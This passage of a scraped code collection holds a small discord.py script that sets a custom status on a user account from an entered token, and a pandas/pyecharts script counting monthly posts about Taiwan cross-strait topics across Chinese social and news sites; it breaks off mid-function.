metadata | text
---|---
{
"source": "13-05/discord.RED",
"score": 3
} |
#### File: 13-05/discord.RED/red_rpc.py
```python
import discord
import asyncio
from colorama import init, Fore, Back, Style
import os
def custom_rpc():
    # Prompt for an account token and set an idle "playing" status on that account
    # (runs with bot=False, i.e. against a user token rather than a bot token).
client = discord.Client()
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
init()
print(f"{Fore.BLUE}Your Token: ", end='')
TOKEN = input()
@client.event
async def on_ready():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print(f"{Fore.BLUE}Status message: ", end='')
STATUS = input()
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
await client.change_presence(status=discord.Status.idle, activity=discord.Game(STATUS))
print(f"{Fore.RED}{client.user}'s status{Fore.MAGENTA} is now {Fore.BLUE}\"{STATUS}\"{Fore.MAGENTA}.")
client.run(TOKEN,bot=False)
``` |
{
"source": "13060923171/Crawl-Project2",
"score": 3
} |
#### File: 台海舆论-数据分析(可视化系统)/demo/Terrace_Line.py
```python
import pandas as pd
import pyecharts.options as opts
from pyecharts.charts import Line
from pyecharts.globals import ThemeType
def weibo_sum():
    # Monthly Weibo post counts: read the 'from' (or 'from1') column of each sheet,
    # keep the first 8 characters of the timestamp as the key, and tally occurrences.
df1 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/1.xlsx').loc[:,['from']]
sum_weibo = []
for d1 in df1['from']:
d1 = str(d1)
d1 = d1[0:8]
sum_weibo.append(d1)
df2 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/2.xlsx').loc[:,['from']]
for d2 in df2['from']:
d2 = str(d2)
d2 = d2[0:8]
if 'nan' not in d2:
sum_weibo.append(d2)
df3 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/3.xlsx').loc[:,['from']]
for d3 in df3['from']:
d3 = str(d3)
d3 = d3[0:8]
if 'nan' not in d3:
sum_weibo.append(d3)
df4 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/4.xlsx').loc[:,['from']]
for d4 in df4['from']:
d4 = str(d4)
d4 = d4[0:8]
if 'nan' not in d4:
sum_weibo.append(d4)
    df5 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/4.xlsx').loc[:,['from']]  # note: this re-reads 4.xlsx (5.xlsx may have been intended)
for d5 in df5['from']:
d5 = str(d5)
d5 = d5[0:8]
if 'nan' not in d5:
sum_weibo.append(d5)
df6 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/6.xlsx').loc[:,['from']]
for d6 in df6['from']:
d6 = str(d6)
d6 = d6[0:8]
if 'nan' not in d6:
sum_weibo.append(d6)
df7 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/7.xlsx').loc[:, ['from']]
for d7 in df7['from']:
d7 = str(d7)
d7 = d7[0:8]
if 'nan' not in d7:
sum_weibo.append(d7)
df8 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/8.xlsx').loc[:, ['from']]
for d8 in df8['from']:
d8 = str(d8)
d8 = d8[0:8]
if 'nan' not in d8:
sum_weibo.append(d8)
df9 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/9.xlsx').loc[:, ['from']]
for d9 in df9['from']:
d9 = str(d9)
d9 = d9[0:8]
if 'nan' not in d9:
sum_weibo.append(d9)
df10 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/10.xlsx').loc[:, ['from']]
for d10 in df10['from']:
d10 = str(d10)
d10 = d10[0:8]
if 'nan' not in d10:
sum_weibo.append(d10)
df11 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/11.xlsx').loc[:, ['from']]
for d11 in df11['from']:
d11 = str(d11)
d11 = d11[0:8]
if 'nan' not in d11:
sum_weibo.append(d11)
df12 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/12.xlsx').loc[:, ['from']]
for d12 in df12['from']:
d12 = str(d12)
d12 = d12[0:8]
if 'nan' not in d12:
sum_weibo.append(d12)
df13 = pd.read_excel('./台湾文本-数据/微博/两岸关系微博.xlsx').loc[:, ['from']]
for d13 in df13['from']:
d13 = str(d13)
d13 = d13[0:8]
if 'nan' not in d13:
sum_weibo.append(d13)
df14 = pd.read_excel('./台湾文本-数据/微博/微博中国内政.xlsx').loc[:, ['from']]
for d14 in df14['from']:
d14 = str(d14)
d14 = d14[0:8]
if 'nan' not in d14:
sum_weibo.append(d14)
df15 = pd.read_excel('./台湾文本-数据/微博/微博分裂势力.xlsx').loc[:, ['from']]
for d15 in df15['from']:
d15 = str(d15)
d15 = d15[0:8]
if 'nan' not in d15:
sum_weibo.append(d15)
df16 = pd.read_excel('./台湾文本-数据/微博/微博台军.xlsx').loc[:, ['from']]
for d16 in df16['from']:
d16 = str(d16)
d16 = d16[0:8]
if 'nan' not in d16:
sum_weibo.append(d16)
df17 = pd.read_excel('./台湾文本-数据/微博/微博台湾政治.xlsx').loc[:, ['from']]
for d17 in df17['from']:
d17 = str(d17)
d17 = d17[0:8]
if 'nan' not in d17:
sum_weibo.append(d17)
df18 = pd.read_excel('./台湾文本-数据/微博/微博台湾海峡.xlsx').loc[:, ['from']]
for d18 in df18['from']:
d18 = str(d18)
d18 = d18[0:8]
if 'nan' not in d18:
sum_weibo.append(d18)
df19 = pd.read_excel('./台湾文本-数据/微博/微博台湾牌.xlsx').loc[:, ['from']]
for d19 in df19['from']:
d19 = str(d19)
d19 = d19[0:8]
if 'nan' not in d19:
sum_weibo.append(d19)
df20 = pd.read_excel('./台湾文本-数据/微博/微博台湾疫情.xlsx').loc[:, ['from']]
for d20 in df20['from']:
d20 = str(d20)
d20 = d20[0:8]
if 'nan' not in d20:
sum_weibo.append(d20)
df21 = pd.read_excel('./台湾文本-数据/微博/微博台湾经济.xlsx').loc[:, ['from']]
for d21 in df21['from']:
d21 = str(d21)
d21 = d21[0:8]
if 'nan' not in d21:
sum_weibo.append(d21)
df22 = pd.read_excel('./台湾文本-数据/微博/微博台独.xlsx').loc[:, ['from']]
for d22 in df22['from']:
d22 = str(d22)
d22 = d22[0:8]
if 'nan' not in d22:
sum_weibo.append(d22)
df23 = pd.read_excel('./台湾文本-数据/微博/微博和平统一.xlsx').loc[:, ['from']]
for d23 in df23['from']:
d23 = str(d23)
d23 = d23[0:8]
if 'nan' not in d23:
sum_weibo.append(d23)
df24 = pd.read_excel('./台湾文本-数据/微博/微博拜登台湾.xlsx').loc[:, ['from']]
for d24 in df24['from']:
d24 = str(d24)
d24 = d24[0:8]
if 'nan' not in d24:
sum_weibo.append(d24)
df25 = pd.read_excel('./台湾文本-数据/微博/微博武统.xlsx').loc[:, ['from']]
for d25 in df25['from']:
d25 = str(d25)
d25 = d25[0:8]
if 'nan' not in d25:
sum_weibo.append(d25)
df26 = pd.read_excel('./台湾文本-数据/微博/微博特朗普台湾.xlsx').loc[:, ['from']]
for d26 in df26['from']:
d26 = str(d26)
d26 = d26[0:8]
if 'nan' not in d26:
sum_weibo.append(d26)
df27 = pd.read_excel('./台湾文本-数据/微博/微博美台.xlsx').loc[:, ['from']]
for d27 in df27['from']:
d27 = str(d27)
d27 = d27[0:8]
if 'nan' not in d27:
sum_weibo.append(d27)
df28 = pd.read_excel('./台湾文本-数据/微博/微博蔡英文.xlsx').loc[:, ['from1']]
for d28 in df28['from1']:
d28 = str(d28)
d28 = d28[0:8]
if 'nan' not in d28:
sum_weibo.append(d28)
df29 = pd.read_excel('./台湾文本-数据/微博/微博领土主权.xlsx').loc[:, ['from']]
for d29 in df29['from']:
d29 = str(d29)
d29 = d29[0:8]
if 'nan' not in d29:
sum_weibo.append(d29)
d = {}
for s in sum_weibo:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=True)
del ls[-10:]
del ls[0]
return ls
def huanqiuw_sum():
df = pd.read_excel('./台湾文本-数据/环球网/环球网台海.xlsx').loc[:, ['time']]
sum_list = []
for d in df['time']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def zhongguotaiwanwang():
df1 = pd.read_excel('./台湾文本-数据/中国台湾网/两岸.xlsx').loc[:, ['info']]
sum_list = []
for d1 in df1['info']:
d1 = str(d1)
d1 = d1[0:7]
if 'nan' not in d1:
sum_list.append(d1)
df2 = pd.read_excel('./台湾文本-数据/中国台湾网/两岸快评.xlsx').loc[:, ['info']]
for d2 in df2['info']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中国台湾网/台商.xlsx').loc[:, ['info']]
for d3 in df3['info']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中国台湾网/台湾自2020年12月-2021.1.4时事.xlsx').loc[:, ['info']]
for d4 in df4['info']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中国台湾网/文化.xlsx').loc[:, ['info']]
for d5 in df5['info']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/中国台湾网/海峡时评.xlsx').loc[:, ['info']]
for d6 in df6['info']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/中国台湾网/经贸.xlsx').loc[:, ['info']]
for d7 in df7['info']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/中国台湾网/网友专栏.xlsx').loc[:, ['日期时间']]
for d8 in df8['日期时间']:
d8 = str(d8).replace('年','-')
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/中国台湾网/网友快言.xlsx').loc[:, ['info']]
for d9 in df9['info']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/中国台湾网/萧萧话两岸.xlsx').loc[:, ['info']]
for d10 in df10['info']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/中国台湾网/部委.xlsx').loc[:, ['info']]
for d11 in df11['info']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=True)
del ls[-13:]
return ls
def zhihu():
df = pd.read_excel('./台湾文本-数据/知乎/知乎台海局势的数据.xlsx').loc[:, ['ContentItem-action']]
sum_list = []
for d in df['ContentItem-action']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:13]
del ls[-2:]
return ls
def ribao_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d.replace('年', '-')
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网台海局势.xlsx').loc[:, ['日期时间']]
for d2 in df2['日期时间']:
d2 = str(d2)
d2 = d2.replace('年', '-')
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网台湾牌.xlsx').loc[:, ['日期时间']]
for d3 in df3['日期时间']:
d3 = str(d3)
d3 = d3.replace('年', '-')
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网和平统一.xlsx').loc[:, ['日期时间']]
for d4 in df4['日期时间']:
d4 = str(d4)
d4 = d4.replace('年', '-')
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中国日报网/微博民进党.xlsx').loc[:, ['from']]
for d5 in df5['from']:
d5 = str(d5)
d5 = d5.replace('年','-')
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def zhongxing_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/中新网/中新网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/中新网/中新网台海局势.xlsx').loc[:, ['日期时间']]
for d2 in df2['日期时间']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中新网/中新网台军.xlsx').loc[:, ['日期时间']]
for d3 in df3['日期时间']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾政治.xlsx').loc[:, ['日期时间']]
for d4 in df4['日期时间']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾海峡.xlsx').loc[:, ['日期时间']]
for d5 in df5['日期时间']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾牌.xlsx').loc[:, ['日期时间']]
for d6 in df6['日期时间']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾疫情.xlsx').loc[:, ['日期时间']]
for d7 in df7['日期时间']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾经济.xlsx').loc[:, ['日期时间']]
for d8 in df8['日期时间']:
d8 = str(d8)
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/中新网/中新网台独.xlsx').loc[:, ['日期时间']]
for d9 in df9['日期时间']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/中新网/中新网和平统一.xlsx').loc[:, ['日期时间']]
for d10 in df10['日期时间']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/中新网/中新网武统.xlsx').loc[:, ['日期时间']]
for d11 in df11['日期时间']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/中新网/中新网民进党.xlsx').loc[:, ['日期时间']]
for d12 in df12['日期时间']:
d12 = str(d12)
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/中新网/中新网美台.xlsx').loc[:, ['日期时间']]
for d13 in df13['日期时间']:
d13 = str(d13)
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/中新网/中新网蔡英文.xlsx').loc[:, ['日期时间']]
for d14 in df14['日期时间']:
d14 = str(d14)
d14 = d14[0:7]
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:46]
return ls
def jinri_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/今日头条/今日头条两岸关系.xlsx').loc[:, ['lbtn1']]
for d in df['lbtn1']:
d = str(d)
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台军.xlsx').loc[:, ['lbtn1']]
for d2 in df2['lbtn1']:
d2 = str(d2)
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台海局势.xlsx').loc[:, ['time']]
for d3 in df3['time']:
d3 = str(d3)
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾政治.xlsx').loc[:, ['lbtn1']]
for d4 in df4['lbtn1']:
d4 = str(d4)
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾海峡.xlsx').loc[:, ['lbtn1']]
for d5 in df5['lbtn1']:
d5 = str(d5)
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾牌.xlsx').loc[:, ['lbtn1']]
for d6 in df6['lbtn1']:
d6 = str(d6)
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾疫情.xlsx').loc[:, ['lbtn1']]
for d7 in df7['lbtn1']:
d7 = str(d7)
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台独.xlsx').loc[:, ['lbtn1']]
for d8 in df8['lbtn1']:
d8 = str(d8)
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/今日头条/今日头条和平统一.xlsx').loc[:, ['lbtn1']]
for d9 in df9['lbtn1']:
d9 = str(d9)
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/今日头条/今日头条拜登台湾.xlsx').loc[:, ['lbtn1']]
for d10 in df10['lbtn1']:
d10 = str(d10)
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/今日头条/今日头条武统.xlsx').loc[:, ['lbtn1']]
for d11 in df11['lbtn1']:
d11 = str(d11)
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/今日头条/今日头条民进党.xlsx').loc[:, ['lbtn1']]
for d12 in df12['lbtn1']:
d12 = str(d12)
if 'nan' not in d12:
sum_list.append(d12)
df13= pd.read_excel('./台湾文本-数据/今日头条/今日头条特朗普台湾.xlsx').loc[:, ['lbtn1']]
for d13 in df13['lbtn1']:
d13 = str(d13)
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/今日头条/今日头条美台.xlsx').loc[:, ['lbtn1']]
for d14 in df14['lbtn1']:
d14 = str(d14)
if 'nan' not in d14:
sum_list.append(d14)
df15 = pd.read_excel('./台湾文本-数据/今日头条/今日头条蔡英文.xlsx').loc[:, ['lbtn1']]
for d15 in df15['lbtn1']:
d15 = str(d15)
if 'nan' not in d15:
sum_list.append(d15)
df16 = pd.read_excel('./台湾文本-数据/今日头条/台湾经济.xlsx').loc[:, ['lbtn1']]
for d16 in df16['lbtn1']:
d16 = str(d16)
if 'nan' not in d16:
sum_list.append(d16)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def guangming_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/光明网/光明网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/光明网/光明网台军.xlsx').loc[:, ['m-news-box2']]
for d2 in df2['m-news-box2']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df4 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾政治.xlsx').loc[:, ['m-news-box1']]
for d4 in df4['m-news-box1']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾海峡.xlsx').loc[:, ['m-news-box1']]
for d5 in df5['m-news-box1']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾牌.xlsx').loc[:, ['日期时间']]
for d6 in df6['日期时间']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾疫情.xlsx').loc[:, ['m-news-box1']]
for d7 in df7['m-news-box1']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾经济.xlsx').loc[:, ['m-news-box1']]
for d8 in df8['m-news-box1']:
d8 = str(d8)
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/光明网/光明网台独.xlsx').loc[:, ['m-news-box1']]
for d9 in df9['m-news-box1']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/光明网/光明网和平统一.xlsx').loc[:, ['日期时间']]
for d10 in df10['日期时间']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/光明网/光明网武统.xlsx').loc[:, ['m-news-box1']]
for d11 in df11['m-news-box1']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/光明网/光明网民进党.xlsx').loc[:, ['m-news-box1']]
for d12 in df12['m-news-box1']:
d12 = str(d12)
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/光明网/光明网蔡英文.xlsx').loc[:, ['m-news-box1']]
for d13 in df13['m-news-box1']:
d13 = str(d13)
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:20]
return ls
def fenghuan_sum():
    # Monthly counts for ifeng (凤凰网); the del calls below trim the month range and
    # a hand-filled point for 2021/01 is appended at the end.
sum_list = []
df = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台军.xlsx').loc[:, ['字段2']]
for d in df['字段2']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df3 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台湾海峡.xlsx').loc[:, ['字段2']]
for d3 in df3['字段2']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df6 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台独.xlsx').loc[:, ['字段2']]
for d6 in df6['字段2']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df9 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰民进党.xlsx').loc[:, ['字段2']]
for d9 in df9['字段2']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df11 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰网两岸关系.xlsx').loc[:, ['字段2']]
for d11 in df11['字段2']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df14 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰网和平统一.xlsx').loc[:, ['字段2']]
for d14 in df14['字段2']:
d14 = str(d14)
d14 = d14[0:7]
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[-18:]
del ls[0:36]
ls.append(('2021/01',36))
return ls
def xinhua_sum():
    # Monthly counts for Xinhua (新华网): strip the site prefix from each timestamp,
    # keep the 7-character year-month key, and pad missing months with zero counts.
sum_list = []
df = pd.read_excel('./台湾文本-数据/新华网/新华网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d.replace('新华网\\u2003\\t\\t\\t\\t', '')
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df3 = pd.read_excel('./台湾文本-数据/新华网/新华网台海局势.xlsx').loc[:, ['newstime']]
for d3 in df3['newstime']:
d3 = str(d3)
d3 = d3.replace('新华网\\u2003\\t\\t\\t\\t', '')
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾政治.xlsx').loc[:, ['newstime']]
for d4 in df4['newstime']:
d4 = str(d4)
d4 = d4.replace('新华网\\u2003\\t\\t\\t\\t', '')
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾海峡.xlsx').loc[:, ['newstime']]
for d5 in df5['newstime']:
d5 = str(d5)
d5 = d5.replace('新华网\\u2003\\t\\t\\t\\t', '')
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾牌.xlsx').loc[:, ['newstime']]
for d6 in df6['newstime']:
d6 = str(d6)
d6 = d6.replace('新华网\\u2003\\t\\t\\t\\t', '')
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾疫情.xlsx').loc[:, ['newstime']]
for d7 in df7['newstime']:
d7 = str(d7)
d7 = d7.replace('新华网\\u2003\\t\\t\\t\\t', '')
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾经济.xlsx').loc[:, ['newstime']]
for d8 in df8['newstime']:
d8 = str(d8)
d8 = d8.replace('新华网\\u2003\\t\\t\\t\\t', '')
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/新华网/新华网台独.xlsx').loc[:, ['newstime']]
for d9 in df9['newstime']:
d9 = str(d9)
d9 = d9.replace('新华网\\u2003\\t\\t\\t\\t', '')
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/新华网/新华网和平统一.xlsx').loc[:, ['newstime']]
for d10 in df10['newstime']:
d10 = str(d10)
d10 = d10.replace('新华网\\u2003\\t\\t\\t\\t', '')
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/新华网/新华网武统.xlsx').loc[:, ['newstime']]
for d11 in df11['newstime']:
d11 = str(d11)
d11 = d11.replace('新华网\\u2003\\t\\t\\t\\t', '')
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/新华网/新华网民进党.xlsx').loc[:, ['newstime']]
for d12 in df12['newstime']:
d12 = str(d12)
d12 = d12.replace('新华网\\u2003\\t\\t\\t\\t', '')
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/新华网/新华网美台.xlsx').loc[:, ['newstime']]
for d13 in df13['newstime']:
d13 = str(d13)
d13 = d13.replace('新华网\\u2003\\t\\t\\t\\t', '')
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/新华网/新华网蔡英文.xlsx').loc[:, ['newstime']]
for d14 in df14['newstime']:
d14 = str(d14)
d14 = d14.replace('新华网\\u2003\\t\\t\\t\\t', '')
d14 = d14[0:7]
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[-13:]
del ls[0:10]
ls.append(('2020-02', 0))
ls.append(('2020-03', 0))
ls.append(('2020-04', 0))
ls.append(('2020-05', 0))
ls.append(('2020-06', 0))
ls.append(('2020-07', 0))
ls.append(('2020-10', 0))
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def terrace_line():
    # Gather the monthly counts from every platform and return one shared x axis
    # (the 中国台湾网 months) plus the ten y-value series used by the chart code below.
list1 = weibo_sum()
list1.sort(key=lambda x: x[0], reverse=False)
x_data1 = []
y_data1 = []
for l in list1:
x = l[0].replace('年','-').replace('月','')
x_data1.append(x)
y_data1.append(l[1])
list2 = huanqiuw_sum()
x_data2 = []
y_data2 = []
for l in list2:
x_data2.append(l[0])
y_data2.append(l[1])
y_data2.insert(0,0)
y_data2.insert(0,0)
y_data2.insert(0,0)
list3 = zhongguotaiwanwang()
x_data3 = []
y_data3 = []
list3.sort(key=lambda x: x[0], reverse=False)
for l in list3:
x_data3.append(l[0])
y_data3.append(l[1])
list4 = zhihu()
x_data4 = []
y_data4 = []
for l in list4:
x_data4.append(l[0])
y_data4.append(l[1])
y_data4.insert(1,0)
list5 = ribao_sum()
x_data5 = []
y_data5 = []
list5.sort(key=lambda x: x[0], reverse=False)
for l in list5:
x_data5.append(l[0])
y_data5.append(l[1])
list6 = zhongxing_sum()
x_data6 = []
y_data6 = []
list6.sort(key=lambda x: x[0], reverse=False)
for l in list6:
x_data6.append(l[0])
y_data6.append(l[1])
list7 = jinri_sum()
x_data7 = ['2020-01', '2020-02', '2020-03', '2020-04', '2020-05', '2020-06', '2020-07', '2020-08', '2020-09', '2020-10', '2020-11', '2020-12', '2021-01']
y_data7 = [315, 255, 172, 84, 85, 30,42,36,64,14, 3, 141, 308]
